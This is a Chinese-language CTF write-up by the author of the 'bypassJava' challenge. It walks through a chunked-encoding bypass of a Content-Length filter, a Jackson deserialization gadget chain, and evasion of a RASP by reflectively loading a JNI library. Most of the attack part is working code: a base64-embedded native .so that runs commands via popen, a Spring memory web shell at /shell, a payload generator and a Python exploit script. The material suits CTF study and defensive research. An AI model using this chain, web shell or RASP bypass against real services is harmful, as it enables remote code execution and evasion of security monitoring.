题目源码、docker环境和exp已全部上传至GitHub:https://github.com/pankass/DASCTF_X_CBCTF2023_bypassJava
该题是我在学习RASP的时候出的 第一次公开赛中出java题,佬们轻喷
题目给了jar包
审计代码发现 /read
路由存在反序列化接口,且题目存在 jackson 依赖,可以打jackson 的反序列化链子来执行任意代码。
但注意到filter进行了限制
这里通过 servletRequest.getContentLength()
到的值不能大于 1145,否则无法进入到反序列化的路由,而构造长度小于 1145 的payload几乎是不可能的事,所以得另外找个方法绕过。
chunked 编码绕过getContentLength
通过调试,追溯调用栈,深入源码看看这个contentLength是怎么来的,在 org.apache.coyote.http11.Http11Processor#prepareInputFilters
方法中可以发现,当请求头中出现 transfer-encoding: chunked
时,contentLength的值会被设置为 -1L
所以使用 chunked
编码来绕过 getContentLength()
的限制。
成功触发反序列化(注意chunked编码报文格式)
绕过RASP
可以反序列化执行任意代码,尝试打内存马执行命令,但发现存在RASP,hook了底层执行命令的native方法 forkAndExec
同时发现权限不是root,没法直接读flag,要RCE才行,利用java代码读取文件目录结构,发现/home/ctf/有个simpleRASP.jar的文件,写java代码读取该文件审计
发现不仅hook了forkAndExec
,还hook了 loadLibrary0
这下也没法直接使用常规的 System.load()
来直接加载 JNI来绕过。
但深入源码不难发现其底层的native方法 java.lang.ClassLoader.NativeLibrary#load
并未被hook,并且反射也是可以正常使用的,所以可以尝试使用反射来调用 java.lang.ClassLoader.NativeLibrary
中的 load
方法来加载恶意so文件执行命令
//调用java.lang.ClassLoader$NativeLibrary类的load方法加载动态链接库
......
public class EvilClass {
public static native String execCmd(String cmd);
}
......
ClassLoader cmdLoader = EvilClass.class.getClassLoader();
Class<?> classLoaderClazz = Class.forName("java.lang.ClassLoader");
Class<?> nativeLibraryClazz = Class.forName("java.lang.ClassLoader$NativeLibrary");
Method load = nativeLibraryClazz.getDeclaredMethod("load", String.class, boolean.class);
load.setAccessible(true);
Field field = classLoaderClazz.getDeclaredField("nativeLibraries");
field.setAccessible(true);
Vector<Object> libs = (Vector<Object>) field.get(cmdLoader);
Constructor<?> nativeLibraryCons = nativeLibraryClazz.getDeclaredConstructor(Class.class, String.class, boolean.class);
nativeLibraryCons.setAccessible(true);
Object nativeLibraryObj = nativeLibraryCons.newInstance(EvilClass.class, LIB_PATH, false);
libs.addElement(nativeLibraryObj);
//这里注意要将libs放入对应的ClassLoader中(跟着源码调下就能知道)
field.set(cmdLoader, libs);
load.invoke(nativeLibraryObj, LIB_PATH, false);
//执行命令
EvilClass.execCmd("whoami");
......
......
制作JNI
准备 EvilClass.java
public class EvilClass {
public static native String execCmd(String cmd);
}
在当前目录运行
javac EvilClass.java
javah EvilClass
生成 EvilClass.h 文件如下
/* DO NOT EDIT THIS FILE - it is machine generated */
#include <jni.h>
/* Header for class EvilClass */
#ifndef _Included_EvilClass
#define _Included_EvilClass
#ifdef __cplusplus
extern "C" {
#endif
/*
* Class: EvilClass
* Method: execCmd
* Signature: (Ljava/lang/String;)Ljava/lang/String;
*/
JNIEXPORT jstring JNICALL Java_EvilClass_execCmd
(JNIEnv *, jclass, jstring);
#ifdef __cplusplus
}
#endif
#endif
根据EvilClass.h文件编写EvilClass.c文件
EvilClass.c
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include "EvilClass.h"
int execmd(const char *cmd, char *result)
{
char buffer[1024*12]; //定义缓冲区
FILE *pipe = popen(cmd, "r"); //打开管道,并执行命令
if (!pipe)
return 0; //返回0表示运行失败
while (!feof(pipe))
{
if (fgets(buffer, 128, pipe))
{ //将管道输出到result中
strcat(result, buffer);
}
}
pclose(pipe); //关闭管道
return 1; //返回1表示运行成功
}
JNIEXPORT jstring JNICALL Java_EvilClass_execCmd(JNIEnv *env, jclass class_object, jstring jstr)
{
const char *cstr = (*env)->GetStringUTFChars(env, jstr, NULL);
char result[1024 * 12] = ""; //定义存放结果的字符串数组
if (1 == execmd(cstr, result))
{
// printf(result);
}
char return_messge[100] = "";
strcat(return_messge, result);
jstring cmdresult = (*env)->NewStringUTF(env, return_messge);
//system();
return cmdresult;
}
编译生成对应动态链接库文件
gcc -fPIC -I $JAVA_HOME/include -I $JAVA_HOME/include/linux -shared -o libcmd.so EvilClass.c
将该so文件base64编码放到java代码中方便加载。
利用 TemplateImpl 来执行java代码,这里和内存马直接就放一起了,方便一些
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.Vector;
public class EvilClass extends AbstractTranslet {
public static native String execCmd(String cmd);
//恶意动态链接库文件的base64编码
private static final String EVIL_JNI_BASE64 = "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gz3GLgAAAEiJ5XQMSIs9Ei8AAOhd////6Gj////GBQkvAAABXcMPH4AAAAAAww8fgAAAAADpe////1VIieVIgewgMAAASIm96M///0iJteDP//9Ii4Xoz///SI01dA4AAEiJx+js/v//SIlF+EiDffgAdT24AAAAAOtXSItV+EiNhfDP//++gAAAAEiJx+iS/v//SIXAdBlIjZXwz///SIuF4M///0iJ1kiJx+i0/v//SItF+EiJx+h4/v//hcB0ukiLRfhIicfoOP7//7gBAAAAycNVSInlSIHsoDAAAEiJvXjP//9IibVwz///SImVaM///0iLhXjP//9IiwBMi4BIBQAASIuNaM///0iLhXjP//+6AAAAAEiJzkiJx0H/0EiJRfhIx4Xwz///AAAAAEjHhfjP//8AAAAASI2FAND//7rwLwAAvgAAAABIicfowf3//0iNlfDP//9Ii0X4SInWSInH6Nv9//9Ix4WAz///AAAAAEjHhYjP//8AAAAASMeFkM///wAAAABIx4WYz///AAAAAEjHhaDP//8AAAAASMeFqM///wAAAABIx4Wwz///AAAAAEjHhbjP//8AAAAASMeFwM///wAAAABIx4XIz///AAAAAEjHhdDP//8AAAAASMeF2M///wAAAADHheDP//8AAAAASI2V8M///0iNhYDP//9IidZIicfoVP3//0iLhXjP//9IiwBIi4g4BQAASI2VgM///0iLhXjP//9IidZIicf/0UiJRfBIi0XwycMAAABIg+wyAAAAARsDOygAAAAEAAAAHPD//0QAAACc8P//bAAAAGHx//+EAAAA+/H//6QAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAANDv//+AAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAAAo8P//CAAAAAAAAAAAAAAAHAAAAFwAAADV8P//mgAAAABBDhCGAkMNBgKVDAcIAAAcAAAAfAAAAE/x//9uAQAAAEEOEIYCQw0GA2kBDAcgEQAAAAAAACARAAAAAAAAAQAAAAAAAACZAAAAAAAAAAwAAAAAAAAAABAAAAAAAAANAAAAAAAAAHATAAAAAAAAGQAAAAAAAAAQPgAAAAAAABsAAAAAAAAACAAAAAAAAAAaAAAAAAAAABg+AAAAAAAAHAAAAAAA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AAC9AQAAIAAAAAAAAAAAAAAAAAAAAAAAAADXAQAAIgAAAAAAAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjAAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AEV2aWxDbGFzcy5jAF9fRlJBTUVfRU5EX18AX2ZpbmkAX19kc29faGFuZGxlAF9EWU5BTUlDAF9fR05VX0VIX0ZSQU1FX0hEUgBfX1RNQ19FTkRfXwBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2luaXQAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAHBjbG9zZUBHTElCQ18yLjIuNQBtZW1zZXRAR0xJQkNfMi4yLjUAZmdldHNAR0xJQkNfMi4yLjUAZmVvZkBHTElCQ18yLjIuNQBfX2dtb25fc3RhcnRfXwBleGVjbWQASmF2YV9FdmlsQ2xhc3NfZXhlY0NtZABwb3BlbkBHTElCQ18yLjIuNQBzdHJjYXRAR0xJQkNfMi4yLjUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZUBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0LmdvdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZV9oZHIALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5maW5pX2FycmF5AC5keW5hbWljAC5nb3QucGx0AC5kYXRhAC5ic3MALmNvbW1lbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAcAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAAkAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC4AAAD2//9vAgAAAAAAAABgAgAAAAAAAGACAAAAAAAAKAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAA4AAAACwAAAAIAAAAAAAAAiAIAAAAAAACIAgAAAAAAADgBAAAAAAAABAAAAAEAAAAIAAAAAAAAABgAAAAAAAAAQAAAAAMAAAACAAAAAAAAAMADAAAAAAAAwAMAAAAAAACvAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAEgAAAD///9vAgAAAAAAAABwBAAAAAAAAHAEAAAAAAAAGgAAAAAAAAADAAAAAAAAAAIAAAAAAAAAAgAAAAAAAABVAAAA/v//bwIAAAAAAAAAkAQAAAAAAACQBAAAAAAAACAAAAAAAAAABAAAAAEAAAAIAAAAAAAAAAAAAAAAAAAAZAAAAAQAAAACAAAAAAAAALAEAAAAAAAAsAQAAAAAAACoAAAAAAAAAAMAAAAAAAAACAAAAAAAAAAYAAAAAAAAAG4AAAAEAAAAQgAAAAAAAABYBQAAAAAAAFgFAAAAAAAAqAAAAAAAAAADAAAAFQAAAAgAAAAAAAAAGAAAAAAAAAB4AAAAAQAAAAYAAAAAAAAAABAAAAAAAAAAEAAAAAAAABcAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAcwAAAAEAAAAGAAAAAAAAACAQAAAAAAAAIBAAAAAAAACAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAH4AAAABAAAABgAAAAAAAACgEAAAAAAAAKAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAACHAAAAAQAAAAYAAAAAAAAAsBAAAAAAAACwEAAAAAAAAL0CAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAjQAAAAEAAAAGAAAAAAAAAHATAAAAAAAAcBMAAAAAAAAJAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAJMAAAABAAAAAgAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAACbAAAAAQAAAAIAAAAAAAAABCAAAAAAAAAEIAAAAAAAACwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAqQAAAAEAAAACAAAAAAAAADAgAAAAAAAAMCAAAAAAAACcAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAALMAAAAOAAAAAwAAAAAAAAAQPgAAAAAAABAuAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAC/AAAADwAAAAMAAAAAAAAAGD4AAAAAAAAYLgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAywAAAAYAAAADAAAAAAAAACA+AAAAAAAAIC4AAAAAAADAAQAAAAAAAAQAAAAAAAAACAAAAAAAAAAQAAAAAAAAAIIAAAABAAAAAwAAAAAAAADgPwAAAAAAAOAvAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADUAAAAAQAAAAMAAAAAAAAAAEAAAAAAAAAAMAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA3QAAAAEAAAADAAAAAAAAAFBAAAAAAAAAUDAAAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAOMAAAAIAAAAAwAAAAAAAABYQAAAAAAAAFgwAAAAAAAACAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAADoAAAAAQAAADAAAAAAAAAAAAAAAAAAAABYMAAAAAAAACcAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAgDAAAAAAAABABQAAAAAAABoAAAAsAAAACAAAAAAAAAAYAAAAAAAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAAMA1AAAAAAAA8gEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAARAAAAAwAAAAAAAAAAAAAAAAAAAAAAAACyNwAAAAAAAPEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA";
private static final String LIB_PATH = "/tmp/libcmd.so";
static {
try {
byte[] jniBytes = Base64.getDecoder().decode(EVIL_JNI_BASE64);
RandomAccessFile randomAccessFile = new RandomAccessFile(LIB_PATH, "rw");
randomAccessFile.write(jniBytes);
randomAccessFile.close();
//调用java.lang.ClassLoader$NativeLibrary类的load方法加载动态链接库
ClassLoader cmdLoader = EvilClass.class.getClassLoader();
Class<?> classLoaderClazz = Class.forName("java.lang.ClassLoader");
Class<?> nativeLibraryClazz = Class.forName("java.lang.ClassLoader$NativeLibrary");
Method load = nativeLibraryClazz.getDeclaredMethod("load", String.class, boolean.class);
load.setAccessible(true);
Field field = classLoaderClazz.getDeclaredField("nativeLibraries");
field.setAccessible(true);
Vector<Object> libs = (Vector<Object>) field.get(cmdLoader);
Constructor<?> nativeLibraryCons = nativeLibraryClazz.getDeclaredConstructor(Class.class, String.class, boolean.class);
nativeLibraryCons.setAccessible(true);
Object nativeLibraryObj = nativeLibraryCons.newInstance(EvilClass.class, LIB_PATH, false);
libs.addElement(nativeLibraryObj);
field.set(cmdLoader, libs);
load.invoke(nativeLibraryObj, LIB_PATH, false);
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config =
(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);
Method method2 = EvilClass.class.getMethod("shell", HttpServletRequest.class, HttpServletResponse.class);
RequestMappingInfo info = RequestMappingInfo.paths("/shell")
.options(config)
.build();
EvilClass springControllerMemShell = new EvilClass();
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
} catch (Exception hi) {
hi.printStackTrace();
}
}
public void shell(HttpServletRequest request, HttpServletResponse response) throws IOException {
String cmd = request.getParameter("cmd");
if (cmd != null) {
String execRes = EvilClass.execCmd(cmd);
response.getWriter().write(execRes);
response.getWriter().flush();
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
打入内存马执行命令拿到flag
利用反序列化加载上面的恶意类打入内存马,加载JNI来绕过RASP执行命令
POC
生成payload的POC如下
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.*;
import org.springframework.aop.framework.AdvisedSupport;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.util.Base64;
public class Poc0 {
public static void main(String[] args) throws Exception {
ClassPool pool = ClassPool.getDefault();
CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
ctClass0.removeMethod(writeReplace);
ctClass0.toClass();
byte[] bytes = Repository.lookupClass(EvilClass.class).getBytes();
Templates templatesImpl = new TemplatesImpl();
setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
setFieldValue(templatesImpl, "_name", "test");
setFieldValue(templatesImpl, "_tfactory", null);
//利用 JdkDynamicAopProxy 进行封装使其稳定触发
Class<?> clazz = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy");
Constructor<?> cons = clazz.getDeclaredConstructor(AdvisedSupport.class);
cons.setAccessible(true);
AdvisedSupport advisedSupport = new AdvisedSupport();
advisedSupport.setTarget(templatesImpl);
InvocationHandler handler = (InvocationHandler) cons.newInstance(advisedSupport);
Object proxyObj = Proxy.newProxyInstance(clazz.getClassLoader(), new Class[]{Templates.class}, handler);
POJONode jsonNodes = new POJONode(proxyObj);
BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
val.setAccessible(true);
val.set(exp,jsonNodes);
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
objectOutputStream.writeObject(exp);
objectOutputStream.close();
String res = Base64.getEncoder().encodeToString(barr.toByteArray());
System.out.println(res);
}
private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(true);
f.set(obj, arg);
}
}
exp
import requests
#结尾无 /
baseUrl = "http://xxx.xxx.xxx.xxx"
burp0_url = baseUrl + "/read"
burp0_headers = {"Transfer-Encoding": "chunked", "Content-Type": "text/plain", "Connection": "close"}
payload = """"""
hex_string = hex(len(payload))[2:]
hex_string = str(hex_string)
burp0_data = f"{hex_string}\r\n{payload}\r\n0\r\n\r\n"
res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
print(res.text)
res = requests.get(baseUrl + "/shell?cmd=/readflag")
print(res.text)